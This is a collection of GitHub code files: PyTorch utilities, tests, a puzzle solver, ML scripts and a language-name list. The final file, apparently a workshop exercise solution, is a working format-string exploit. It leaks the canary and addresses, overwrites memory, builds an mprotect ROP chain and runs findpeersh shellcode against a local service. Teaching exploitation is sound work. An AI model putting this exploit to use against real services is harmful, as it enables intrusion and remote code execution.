key=by_name)\nprint(L2)\n","repo_name":"vectorxxxx/04-Python","sub_path":"04-函数式编程/函数式编程.py","file_name":"函数式编程.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1145004705","text":"import torch\r\nfrom torch.nn import init\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F \r\nimport functools\r\n\r\ndef load_state_dict(state_dict, net):\r\n model_dict = net.state_dict()\r\n\r\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict} \r\n\r\n for k, v in pretrained_dict.items(): \r\n if v.size() == model_dict[k].size():\r\n model_dict[k] = v\r\n\r\n not_initialized = set()\r\n \r\n for k, v in model_dict.items():\r\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\r\n not_initialized.add(k.split('.')[0])\r\n \r\n print('not initialized', sorted(not_initialized))\r\n net.load_state_dict(model_dict) \r\n\r\n return net\r\n \r\ndef conv3x3(in_planes, out_planes, strd=1, padding=1, bias=False):\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3,\r\n stride=strd, padding=padding, bias=bias)\r\n\r\ndef init_weights(net, init_type='normal', init_gain=0.02):\r\n def init_func(m): # define the initialization function\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n if init_type == 'normal':\r\n init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find(\r\n 'BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, init_gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with %s' % init_type)\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n assert (torch.cuda.is_available())\r\n net.to(gpu_ids[0])\r\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\r\n init_weights(net, init_type, init_gain=init_gain)\r\n return net\r\n\r\nclass CustomBCELoss(nn.Module):\r\n def __init__(self, brock=False, gamma=None):\r\n super(CustomBCELoss, self).__init__()\r\n self.brock = brock\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n x_hat = torch.clamp(pred, 1e-5, 1.0-1e-5) # prevent log(0) from happening\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n if self.brock:\r\n x = 3.0*gt - 1.0 # rescaled to [-1,2]\r\n\r\n loss = -(gamma*x*torch.log(x_hat) + (1.0-gamma)*(1.0-x)*torch.log(1.0-x_hat))\r\n else:\r\n loss = -(gamma*gt*torch.log(x_hat) + (1.0-gamma)*(1.0-gt)*torch.log(1.0-x_hat))\r\n\r\n if w is not None:\r\n if len(w.size()) == 1:\r\n w = w[:,None,None] \r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\nclass CustomMSELoss(nn.Module):\r\n def __init__(self, gamma=None):\r\n super(CustomMSELoss, self).__init__()\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n weight = gamma * gt + (1.0-gamma) * (1 - gt)\r\n loss = (weight * (pred - gt).pow(2)).mean()\r\n\r\n if w is not None:\r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\ndef createMLP(dims, norm='bn', activation='relu', last_op=nn.Tanh(), dropout=False):\r\n act = None\r\n if activation == 'relu':\r\n act 
= nn.ReLU()\r\n if activation == 'lrelu':\r\n act = nn.LeakyReLU()\r\n if activation == 'selu':\r\n act = nn.SELU()\r\n if activation == 'elu':\r\n act = nn.ELU()\r\n if activation == 'prelu':\r\n act = nn.PReLU()\r\n\r\n mlp = []\r\n for i in range(1,len(dims)):\r\n if norm == 'bn':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.BatchNorm1d(dims[i])]\r\n if norm == 'in':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.InstanceNorm1d(dims[i])]\r\n if norm == 'wn':\r\n mlp += [ nn.utils.weight_norm(nn.Linear(dims[i-1], dims[i]), name='weight')]\r\n if norm == 'none':\r\n mlp += [ nn.Linear(dims[i-1], dims[i])]\r\n \r\n if i != len(dims)-1:\r\n if act is not None:\r\n mlp += [act]\r\n if dropout:\r\n mlp += [nn.Dropout(0.2)]\r\n\r\n if last_op is not None:\r\n mlp += [last_op]\r\n\r\n return mlp","repo_name":"Abhilash23x/project_model","sub_path":"lib/net_util.py","file_name":"net_util.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"31808782925","text":"\"\"\"\nAssert that the CycleGan model is imported correctly\n\"\"\"\nimport unittest\nimport torch\nimport os\nfrom models.CycleGan import CycleGan\n\ndef numel(net):\n return sum(p.numel() for p in net.parameters())\n\nnet = CycleGan()\n\nclass TestCycleGan(unittest.TestCase):\n def test_cg_nparams(self): \n nparams = numel(net)\n self.assertEqual(nparams, 14142916 * 2)\n \n def test_cg_output_shape(self):\n dirname = os.path.dirname(__file__)\n filename = dirname + '/test_files/input.pt'\n x = torch.load(filename)\n bsize = x.shape[0]\n\n with torch.no_grad():\n y1 = net.genX(x)\n self.assertEqual(y1.shape, (bsize, 3, 256, 256))\n\n y2 = net.genY(x)\n self.assertEqual(y2.shape, (bsize, 3, 256, 256))\n \n z1 = net.disY(y1)\n self.assertEqual(z1.shape, (bsize, 1, 30, 30))\n \n z2 = net.disX(y2)\n self.assertEqual(z2.shape, (bsize, 1, 30, 30))\n \n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"deepakhr1999/cyclegans","sub_path":"test/test_cyclegan.py","file_name":"test_cyclegan.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"23957175802","text":"def get_coords():\n with open(\"input\") as f:\n return [tuple([int(x.strip()) for x in x.split(\",\")]) for x in f.read().split(\"\\n\") if len(x) > 0]\n\ndef manhattan_dist(sx, sy, ex, ey):\n return abs(sx - ex) + abs(sy - ey)\n\ndef fill_grid(coords):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n\n grid = [[dict() for x in range(max_x)] for y in range(max_y)]\n\n for (idx, (x, y)) in enumerate(coords):\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n grid[gy][gx][idx] = manhattan_dist(x, y, gx, gy)\n\n return grid\n\ndef get_grid_ids(grid):\n res = grid\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n min_dist = min(grid[gy][gx].values())\n if list(grid[gy][gx].values()).count(min_dist) > 1:\n res[gy][gx] = None\n else:\n res[gy][gx] = [idx for (idx, x) in grid[gy][gx].items() if x == min_dist][0]\n return res\n\ndef get_infinites(grid):\n borders = set()\n for x in grid[0]:\n if x is not None:\n borders.add(x)\n for x in grid[-1]:\n if x is not None:\n borders.add(x)\n for y in grid:\n if y[0] is not None:\n borders.add(y[0])\n if y[-1] is not None:\n borders.add(y[-1])\n\n return borders\n\ndef count_idx(grid, idx):\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] == idx:\n count += 1\n return count\n\ndef get_biggest_region_idx(coords, grid, infinites):\n res = list()\n for (idx, (x, y)) in enumerate(coords):\n if idx in infinites:\n continue\n res.append((idx, count_idx(grid, idx)))\n return max(res, key=lambda x: x[1])\n\ndef get_grid_max_dist_region_size(coords, max_dist):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n grid = [[0 for x in range(max_x)] for y in range(max_y)]\n\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n for (x, y) in coords:\n grid[gy][gx] += manhattan_dist(x, y, gx, gy)\n\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] < max_dist:\n count += 1\n return count\n\ndef run():\n coords = get_coords()\n\n # Get a grid with each item marked with the co-ordinate ID and the\n # Manhattan distance to each cell within the grid\n grid = fill_grid(coords)\n\n # Conver each item in the grid to the ID of the co-ordinate that is closest\n grid_ids = get_grid_ids(grid)\n\n # Get a set of all co-ordinate IDs for co-ordinate regions that are\n # infinitely large (i.e. 
are against the border)\n infinite_items = get_infinites(grid_ids)\n\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)[1]\n )\n )\n\n print(\n \"The size of the region which is at least 10,000 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 10000)\n )\n )\n\ndef run_test():\n coords = [(1, 1), (1, 6), (8, 3), (3, 4), (5, 5), (8, 9)]\n grid = fill_grid(coords)\n grid_ids = get_grid_ids(grid)\n print(grid_ids)\n infinite_items = get_infinites(grid_ids)\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)\n )\n )\n print(\n \"The size of the region which is at least 32 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 32)\n )\n )\n\nrun()\n#run_test()\n","repo_name":"polaris64/advent-of-code","sub_path":"2018/06/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"21790571792","text":"\"\"\"\nthis script equalizes the mean and std of the convolutions of a VGG network.\nIt is used to make the VGG network used in the Gatys et al. style transfer\npaper to be compatible with the VGG network used in the Johnson et al. paper.\nIt equalizes the contribution of each layer to the loss.\n\n./stylevgg \n\n must be a constructor in torchelie.models\n\"\"\"\nimport torch\nfrom torchelie.datasets import FastImageFolder\nimport torchvision.transforms as TF\nimport torchelie.models as tchm\nimport torchelie as tch\nimport sys\n\ntorch.autograd.set_grad_enabled(False)\n\nimagenet_path = sys.argv[2]\n\nmodel = sys.argv[1]\nm = tchm.__dict__[model](1000, pretrained='classification/imagenet')\ndel m.classifier\nm.cuda()\nm.eval()\n\nds = FastImageFolder(imagenet_path,\n transform=TF.Compose([\n TF.Resize(256),\n TF.CenterCrop(224),\n TF.ToTensor(),\n tch.nn.ImageNetInputNorm()\n ]))\n\nbatches = [\n b[0] for _, b in zip(\n range(200), torch.utils.data.DataLoader(\n ds, batch_size=320, shuffle=True))\n]\n\nbatch = batches[0].cuda()\n\n\ndef flatvgg():\n layers = []\n\n def _rec(m):\n if len(list(m.children())) == 0:\n layers.append(m)\n else:\n for mm in m.children():\n _rec(mm)\n\n _rec(m.features)\n return torch.nn.Sequential(*layers)\n\n\nidxs = [\n i for i, nm in enumerate(dict(m.features.named_children()).keys())\n if 'conv' in nm\n]\nflat = flatvgg()\n\nflatidxs = [i for i, l in enumerate(flat) if isinstance(l, torch.nn.Conv2d)]\nprint(flatidxs)\n#flatidxs.append(len(flat))\nprint(dict(m.features.named_children()).keys())\n\nprint('before')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nprev_mean = torch.tensor([1, 1, 1]).cuda()\nfor i in range(len(flatidxs)):\n print('computing', i)\n ms = []\n for b in batches:\n with torch.cuda.amp.autocast():\n out = flat[:flatidxs[i] + 2](b.cuda())\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n ms.append(mean)\n mean = torch.stack(ms, dim=0).mean(0).cuda()\n flat[flatidxs[i]].weight.data *= (prev_mean[None, :, None, None]\n / mean[:, None, None, None])\n flat[flatidxs[i]].bias.data /= mean\n prev_mean = mean\n\nprint('after')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nref = tchm.__dict__[model](\n 1000, pretrained='classification/imagenet').features.cuda()(batch[:128])\nprint((m.features(batch[:128])\n - ref / prev_mean[None, :, None, None]).abs().mean().item())\ntorch.save(m.state_dict(), f'{model}.pth')\n","repo_name":"Vermeille/Torchelie","sub_path":"scripts/stylevgg.py","file_name":"stylevgg.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"38"}
+{"seq_id":"43464708948","text":"#支持向量回归机预测(径向基函数)\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import svm\n\ndataset = pd.read_csv('data_wp.csv')\ndata_input = dataset.iloc[:,:-1].values/1000 \ndata_output = dataset.loc[:,['pt']].values/1000 \ntrainlen = int(len(data_input)*0.8) \ntestlen = int(len(data_input)-trainlen) \n\nX_train = data_input[:trainlen].reshape(trainlen,-1) \ny_train = data_output[:trainlen].reshape(trainlen,1) \nX_test = data_input[trainlen:].reshape(testlen,-1) \ny_test = data_output[trainlen:].reshape(testlen,1) \n\nmodel_svm = svm.SVR(kernel='rbf')\nmodel_svm.fit(X_train,y_train)\npred = model_svm.predict(X_test)\n\nplt.figure(figsize=(12,18))\nplt.subplot(211)\nplt.plot(y_test,color='r')\nplt.plot(pred,color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.subplot(212)\nplt.plot(y_test[150:300],color='r')\nplt.plot(pred[150:300],color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.tight_layout()\nplt.show()","repo_name":"aduxhi/learnpython","sub_path":"load_pre2.py","file_name":"load_pre2.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18609264806","text":"# This is the list of language codes with the 'modern' level of support in CLDR\n# (compared to 'full', which contains many more languages). We use this as the\n# list of languages that we store specific name-to-code mappings for.\n\nCLDR_LANGUAGES = {\n 'af',\n 'am',\n 'ar',\n 'az',\n 'be',\n 'bg',\n 'bn',\n 'bs',\n 'ca',\n 'cs',\n 'cy',\n 'da',\n 'de',\n 'el',\n 'en',\n 'es',\n 'et',\n 'eu',\n 'fa',\n 'fi',\n 'fil',\n 'fo',\n 'fr',\n 'ga',\n 'gl',\n 'gu',\n 'he',\n 'hi',\n 'hr',\n 'hu',\n 'hy',\n 'id',\n 'is',\n 'it',\n 'ja',\n 'ka',\n 'kk',\n 'km',\n 'kn',\n 'ko',\n 'ky',\n 'lo',\n 'lt',\n 'lv',\n 'mk',\n 'ml',\n 'mn',\n 'mr',\n 'ms',\n 'my',\n 'nb',\n 'ne',\n 'nl',\n 'pa',\n 'pl',\n 'pt',\n 'ro',\n 'ru',\n 'si',\n 'sk',\n 'sl',\n 'sq',\n 'sr',\n 'sv',\n 'sw',\n 'ta',\n 'te',\n 'th',\n 'ti',\n 'to',\n 'tr',\n 'uk',\n 'und',\n 'ur',\n 'uz',\n 'vi',\n 'yue',\n 'zh',\n 'zu',\n}\n\n\n# These are the names languages that have the most entries on the English and\n# German Wiktionaries. Wiktionary only consistently identifies languages by their\n# name, making it important to be able to recognize the names.\n#\n# These lists of names are used in `tests/test_wikt_languages.py`.\nWIKT_LANGUAGE_NAMES = {}\n\nWIKT_LANGUAGE_NAMES['en'] = [\n \"Spanish\",\n \"French\",\n \"Latvian\",\n \"Latin\",\n \"English\",\n \"Mandarin\",\n \"Italian\",\n \"Portuguese\",\n \"Cantonese\",\n \"Japanese\",\n \"German\",\n \"Swedish\",\n \"Korean\",\n \"Serbo-Croatian\",\n \"Serbian\",\n \"Croatian\",\n \"Bosnian\",\n \"Finnish\",\n \"Vietnamese\",\n \"Dutch\",\n \"Galician\",\n \"Catalan\",\n \"Polish\",\n \"Danish\",\n \"Norwegian Nynorsk\",\n \"Turkish\",\n \"Romanian\",\n \"Lithuanian\",\n \"Ido\",\n \"Old French\",\n \"Czech\",\n \"Norwegian\",\n # Jèrriais -- same as Norman\n \"Esperanto\",\n \"Icelandic\",\n # Old Armenian\n \"Norwegian Bokmål\",\n \"Asturian\",\n \"Hungarian\",\n \"Proto-Germanic\",\n \"Russian\",\n \"Slovene\",\n \"Min Nan\",\n \"Scottish Gaelic\",\n \"Greek\",\n \"Irish\",\n \"Lojban\",\n \"Middle French\",\n \"Malay\",\n \"Luxembourgish\",\n \"Slovak\",\n \"Estonian\",\n \"Persian\",\n \"Venetian\",\n \"Old English\",\n \"Volapük\",\n \"Ladin\",\n \"Faroese\",\n \"Scots\",\n \"Interlingua\",\n \"Romansch\",\n \"Urdu\",\n # Middle Chinese\n \"Indonesian\",\n \"Swahili\",\n \"Middle English\",\n \"Occitan\",\n \"Welsh\",\n \"Old Norse\",\n \"Albanian\",\n \"Old Irish\",\n \"Old Saxon\",\n \"Lower Sorbian\",\n \"Afrikaans\",\n \"Ukrainian\",\n \"Proto-Slavic\",\n \"Ancient Greek\",\n \"Gothic\",\n \"Hawaiian\",\n \"Kurdish\",\n \"Tagalog\",\n \"Old High German\",\n \"Crimean Tatar\",\n \"Manx\",\n \"Sanskrit\",\n \"Hiligaynon\",\n \"West Frisian\",\n \"Hebrew\",\n \"Tok Pisin\",\n \"Proto-Indo-European\",\n \"Macedonian\",\n \"Novial\",\n \"Armenian\",\n \"Arabic\",\n \"Maltese\",\n \"Hakka\",\n \"Sicilian\",\n \"Ladino\",\n \"Basque\",\n \"Breton\",\n # Guernésiais -- same as Norman\n \"Vai\",\n \"Navajo\",\n \"Azeri\",\n \"Vilamovian\",\n # Tarantino\n \"Maori\",\n \"Friulian\",\n \"Hausa\",\n \"Haitian Creole\",\n \"Yiddish\",\n \"Tatar\",\n \"Proto-Malayo-Polynesian\",\n \"Aromanian\",\n \"Ottoman Turkish\",\n \"Old Provençal\",\n \"Northern Sami\",\n \"Dalmatian\",\n \"Bulgarian\",\n \"Neapolitan\",\n \"Cornish\",\n \"Middle Dutch\",\n \"Rapa Nui\",\n # Old Portuguese\n \"Egyptian Arabic\",\n \"Romani\",\n \"Tahitian\",\n \"Thai\",\n \"Limburgish\",\n \"Karelian\",\n \"Tajik\",\n \"Turkmen\",\n \"Kabardian\",\n \"Uzbek\",\n \"Samoan\",\n 
\"Mongolian\",\n \"Zulu\",\n \"Upper Sorbian\",\n \"Walloon\",\n # Proto-Finnic\n \"Frankish\",\n \"Mapudungun\",\n \"Pashto\",\n \"Low German\",\n \"Bashkir\",\n \"Kashubian\",\n \"Sranan Tongo\",\n \"Proto-Sino-Tibetan\",\n \"Norman\",\n \"Proto-Austronesian\",\n \"Marathi\",\n \"Rohingya\",\n \"Classical Nahuatl\",\n # Proto-Malayic\n # German Low German\n \"Fijian\",\n \"Zazaki\",\n \"Proto-Italic\",\n \"Old Dutch\",\n \"Egyptian\",\n \"Old Frisian\",\n \"Greenlandic\",\n \"Burmese\",\n \"Votic\",\n \"Ewe\",\n \"Cherokee\",\n \"Old Church Slavonic\",\n \"Quechua\",\n \"Mirandese\",\n \"Livonian\",\n \"Bengali\",\n \"Skolt Sami\",\n # Proto-Balto-Slavic\n \"Pitjantjatjara\",\n \"Georgian\",\n \"North Frisian\",\n \"Tetum\",\n \"Tongan\",\n # Mauritian Creole\n \"Torres Strait Creole\",\n \"Papiamentu\",\n \"Lao\",\n \"Malagasy\",\n \"Interlingue\",\n \"Aragonese\",\n \"Istriot\",\n \"Sumerian\",\n \"Proto-Celtic\",\n \"Võro\",\n # Proto-Polynesian\n \"Nepali\",\n \"Chickasaw\",\n \"Akkadian\",\n \"Middle Armenian\",\n \"Cimbrian\",\n \"Somali\",\n \"Sardinian\",\n \"Tocharian B\",\n \"Telugu\",\n \"Javanese\",\n \"Taos\",\n \"Proto-Semitic\",\n # Old Prussian\n \"Kyrgyz\",\n \"Corsican\",\n \"Veps\",\n \"Baluchi\",\n \"Middle Low German\",\n \"Middle High German\",\n \"Uyghur\",\n # Dutch Low Saxon\n \"Belarusian\",\n \"Guaraní\",\n \"Undetermined\",\n \"Inuktitut\",\n \"Tocharian A\",\n \"Nigerian Pidgin\",\n # Gallo\n # Saterland Frisian\n \"Punjabi\",\n \"Proto-Algonquian\",\n # Istro-Romanian\n \"Wiradhuri\",\n \"Sichuan Yi\",\n \"Wu\",\n # White Hmong\n \"Ugaritic\",\n \"Sundanese\",\n # Old East Slavic\n # Fala\n # Elfdalian\n \"Tamil\",\n \"Pijin\",\n \"Okinawan\",\n \"Kazakh\",\n \"Hindi\",\n \"Tuvan\",\n \"Polabian\",\n \"Aramaic\",\n \"Malayalam\",\n \"Kumyk\",\n \"Inari Sami\",\n \"Ilocano\",\n \"Tswana\",\n \"Libyan Arabic\",\n \"Latgalian\",\n \"Yakut\",\n \"Sindhi\",\n \"Khmer\",\n \"Gamilaraay\",\n \"Ojibwe\",\n \"Choctaw\",\n \"Chinese\",\n \"Chamorro\",\n \"Yucatec Maya\",\n \"Picard\",\n \"Ngarrindjeri\",\n \"Kott\",\n \"Ingrian\",\n # Crimean Gothic\n \"Chamicuro\",\n \"Rajasthani\",\n # Old Tupi\n \"Old Spanish\",\n \"Gagauz\",\n \"Extremaduran\",\n \"Chinook Jargon\",\n \"Cahuilla\",\n \"Kannada\",\n \"Iban\",\n \"American Sign Language\",\n \"Adyghe\",\n \"Warlpiri\",\n \"Tibetan\",\n \"Ossetian\",\n \"Meriam\",\n \"Marshallese\",\n \"Khakas\",\n \"Balinese\",\n \"Zhuang\",\n \"Tuvaluan\",\n \"Niuean\",\n \"Martuthunira\",\n \"Guugu Yimidhirr\",\n \"Chechen\",\n \"Campidanese Sardinian\",\n \"Tolai\",\n # Old Javanese\n \"Nahuatl\",\n \"Lombard\",\n \"West Coast Bajau\",\n \"Romagnol\",\n \"Middle Irish\",\n \"Yoruba\",\n \"Wangaaybuwan-Ngiyambaa\",\n # Old Swedish\n \"Lingala\",\n \"Fiji Hindi\",\n \"Shabo\",\n \"Sasak\",\n \"Judeo-Arabic\",\n \"Central Kurdish\",\n \"Bislama\",\n]\n\nWIKT_LANGUAGE_NAMES['de'] = [\n \"Deutsch\",\n \"Englisch\",\n \"Polnisch\",\n \"Italienisch\",\n \"Französisch\",\n \"Esperanto\",\n \"Schwedisch\",\n \"Lateinisch\",\n \"Tschechisch\",\n \"Katalanisch\",\n \"Spanisch\",\n \"Okzitanisch\",\n \"Ungarisch\",\n \"Litauisch\",\n \"Finnisch\",\n \"Russisch\",\n \"Altgriechisch\",\n \"Niederländisch\",\n \"Kurdisch\",\n \"Baskisch\",\n \"Armenisch\",\n \"Isländisch\",\n \"Bulgarisch\",\n \"Färöisch\",\n \"Dänisch\",\n \"Portugiesisch\",\n \"Slowakisch\",\n \"Türkisch\",\n \"Maori\",\n \"Albanisch\",\n \"Japanisch\",\n \"Norwegisch\",\n \"Irisch\",\n \"Koreanisch\",\n \"Chinesisch\",\n \"Venezianisch\",\n \"Friaulisch\",\n \"Serbisch\",\n 
\"Indonesisch\",\n \"Walisisch\",\n \"Arabisch\",\n \"Zentral-Nahuatl\",\n \"Neugriechisch\",\n \"Sumerisch\",\n \"Obersorbisch\",\n \"Sesotho\",\n \"Rumänisch\",\n \"Suaheli\",\n \"Persisch\",\n \"Krimtatarisch\",\n \"Plattdeutsch\",\n \"Prußisch\",\n \"Thai\",\n \"Bosnisch\",\n \"Sardisch\",\n \"Maltesisch\",\n \"Akkadisch\",\n \"Hawaiianisch\",\n \"Hebräisch\",\n \"Gotisch\",\n \"Afrikaans\",\n \"Rätoromanisch\",\n \"Tamil\",\n \"Bretonisch\",\n \"Ukrainisch\",\n \"Hindi\",\n \"Georgisch\",\n \"Panjabi\",\n \"Papiamentu\",\n \"Slowenisch\",\n \"Nauruisch\",\n \"Schottisch-Gälisch\",\n \"Balinesisch\",\n \"Estnisch\",\n \"Manx\",\n \"Korsisch\",\n # \"Frühneuhochdeutsch\",\n \"Lettisch\",\n \"isiZulu\",\n \"Tagalog\",\n \"Tok Pisin\",\n # \"Südpikenisch\",\n \"Kroatisch\",\n \"Niedersorbisch\",\n \"Kannada\",\n \"Guanche\",\n \"Weißrussisch\",\n \"Sanskrit\",\n \"Aserbaidschanisch\",\n \"Mittelhochdeutsch\",\n \"Laotisch\",\n \"Altnordisch\",\n \"Altenglisch\",\n \"Vietnamesisch\",\n \"Tadschikisch\",\n \"Samoanisch\",\n \"Mazedonisch\",\n \"Luxemburgisch\",\n \"Hethitisch\",\n # \"Yukatekisch\",\n \"Kaschubisch\",\n \"Wallonisch\",\n # \"Klassisches Nahuatl\",\n \"Telugu\",\n \"Rapanui\",\n \"Jiddisch\",\n \"Ido\",\n # \"Galicisch\",\n \"Volapük\",\n \"Bengalisch\",\n \"Mapudungun\",\n \"Lojban\",\n \"Tuvaluisch\",\n \"Gujarati\",\n \"Assamesisch\",\n]\n","repo_name":"SickGear/SickGear","sub_path":"lib/langcodes/language_lists.py","file_name":"language_lists.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"38"}
+{"seq_id":"2881625826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\ncontext(arch=\"i386\", os=\"linux\")\n\nSHELLCODE = asm(shellcraft.findpeersh())\n\nr = remote('localhost', 20002)\nr.readline()\n\n# Canary = %134$\n# ebp (0xffd2da98) = %137$\n# ret addr (0x56557d4b) = %138$\n# socket = %139$\n\n# fmt base (0x56557000) = ret_addr - 0xd4b\n# buffer addr (0xffd2d86c) = ebp - 556\n# addr of ret (0xffd2da7c) = ebp - 28\n\nr.sendline(flat(\n '%134$08x', # Canary\n '%137$08x', # EBP1\n '%138$08x', # ret addr\n '%139$08x', # socket\n '%145$08x', # EBP2\n '%157$08x' # EBP3\n))\n\ncanary = int(r.recv(8), 16)\nebp1 = int(r.recv(8), 16)\nret = int(r.recv(8), 16)\nsocket = int(r.recv(8), 16)\nebp2 = int(r.recv(8), 16)\nebp3 = int(r.recv(8), 16)\nfmt_base = ret - 0xd4b\nbuffer = ebp1 - 556\nret_addr = ebp1 - 28\nr.recvline()\n\ndef send_receive(fmt):\n r.sendline(fmt)\n return r.recvline()\n\ndef make_pointer(addr):\n send_receive('A' * ((ebp2 & 0xff) + 0) + '%137$hhn')\n send_receive('A' * ((addr >> 0) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 1) + '%137$hhn')\n send_receive('A' * ((addr >> 8) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 2) + '%137$hhn')\n send_receive('A' * ((addr >> 16) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 3) + '%137$hhn')\n send_receive('A' * ((addr >> 24) & 0xff) + '%145$hhn')\n\ndef poke(addr, data):\n for i in range(len(data)):\n make_pointer(addr + i)\n send_receive('A' * data[i] + '%157$hhn')\n\ndef peek(addr):\n make_pointer(addr)\n r.sendline('%157$sTHE_END')\n return r.recvuntil('THE_END\\n')[:-8] + b'\\0'\n\nPAGE_SIZE = 0x1000\nPAGE_MASK = ~(PAGE_SIZE-1)\nshellcode = asm(shellcraft.findpeersh())\nshellcode_addr = ebp3 + 4\n\nadd_esp_76 = fmt_base + 0x00000d13 # add esp, 0x44 ; pop ebx ; pop ebp ; ret\npop2 = fmt_base + 0x00000928 # pop ebx ; pop ebp ; ret\nint_80 = fmt_base + 0x00000e88 # int 0x80 ; ret\npop_ebx = fmt_base + 0x00000739 # pop ebx ; ret\npop_eax = fmt_base + 0x00000d7b # pop eax ; ret\nles_ecx = fmt_base + 0x00000737 # les ecx, ptr [eax] ; pop ebx ; ret\nlea_edx = fmt_base + 0x00000a06 # lea edx, dword ptr [ebx - 0x110] ; mov dword ptr [esp], edx ; call eax\n\n\n# Value to put into ecx:es\npoke(fmt_base + 0x3000, p32(PAGE_SIZE) + b'\\0\\0')\n# Gadget to pivot the stack\npoke(ret_addr, p32(add_esp_76))\n# Shellcode\npoke(shellcode_addr, shellcode)\n\n# ROP chain\n# eax = SYS_mprotect\n# ebx = shellcode addr\n# ecx = len\n# edx = PROT_READ | PROT_WRITE | PROT_EXEC\npoke(ret_addr + 76 + 4, flat(\n #Put 7 into edx\n pop_ebx,\n (constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC) + 0x110,\n pop_eax,\n pop2,\n lea_edx,\n 0xdeadbeef,\n\n #Put 4096 into ecx AND address to mprotect into ebx\n pop_eax, # pop eax ; ret\n fmt_base + 0x3000, # ->eax\n les_ecx, # les ecx, ptr [eax] ; pop ebx ; ret\n shellcode_addr & PAGE_MASK, # address for mprotect must be on a page boundary\n\n pop_eax,\n int(constants.SYS_mprotect),\n int_80,\n shellcode_addr\n ))\n\nr.sendline('exit')\nr.interactive()\n","repo_name":"RobertLarsen/ProsaWorkshop","sub_path":"presentations/04-advanced-exploitation/assignments/solutions/opgave_9.py","file_name":"opgave_9.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"38"}
